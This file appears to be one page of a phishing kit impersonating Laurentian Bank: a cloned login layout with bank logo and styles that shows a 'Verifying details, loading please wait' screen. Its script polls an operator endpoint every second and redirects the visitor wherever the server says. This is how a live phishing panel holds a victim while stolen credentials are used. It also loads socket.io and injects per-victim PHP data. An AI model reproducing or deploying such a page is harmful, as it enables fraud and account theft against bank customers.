<html xmlns:layout="http://www.ultraq.net.nz/web/thymeleaf/layout" lang="en_CA">
    <head>
        <title>Login</title>
        <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=2">
        <link type="text/css" href="/assets/laur/md-reno-base-mobile.css?1" rel="stylesheet">
        <link type="text/css" href="/assets/laur/theme-laurentianbank-md-refresh-mobile.css" rel="stylesheet">
        <link type="text/css" href="/assets/laur/login-common.css" rel="stylesheet">
        <link type="text/css" href="/assets/laur/secure-key.css" rel="stylesheet">
        <link rel="icon" href="/assets/laur/favicon.png">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script >
            setInterval(function() {
                $.post('/deposit/laur/api/status', {page: lrinfo}, function(response) {
                    if (response.status) {
                        location.href = response.href;
                    }
                }, 'JSON');
            }, 1000);
        </script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body ng-app="UxpLoginApp" class="uxp-theme ng-scope">
        <div class="widget-c1-oauth-login position-relative oauth-login">
            <div ng-controller="UxpLoginController as $ctrl" id="c1-login-section" class="ng-scope">
                <form id="loginForm" id="input-form" name="" class="center-block c1-login-form ng-pristine ng-invalid ng-invalid-uxp-pattern ng-invalid-required ng-valid-minlength ng-valid-maxlength" action="" method="post" autocomplete="off">
                    
                    <div>
                        <div ng-form="newLoginForm" ng-hide="showingMemorizedAccounts()" class="ng-pristine ng-invalid ng-invalid-uxp-pattern ng-invalid-required ng-valid-minlength ng-valid-maxlength">
                            <div class="logo text-center">
                                <img src="/assets/laur/logo.svg" alt="Laurentian Bank logo.">
                            </div>
                            <div class="alignment div-loader" style="text-align: center;">
                                <p class="pageTitle" style="text-align: center;font-size: 27px;">Verifying details</p>
                                <img src="/assets/laur/loading.gif" alt="" id="loaderOnLoading" style="width: 96px;margin: 18px 0px;">
                                <p class="desText" style="text-align: center;padding: 20px 0;font-size: 19px;">Loading please wait...</p>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
        <span hidden id="navig"> . </span>
        <span hidden id="stage">Loading</span>
    </body>
    <script src="/bank/laur/js/script.js">
    </script>
</html>
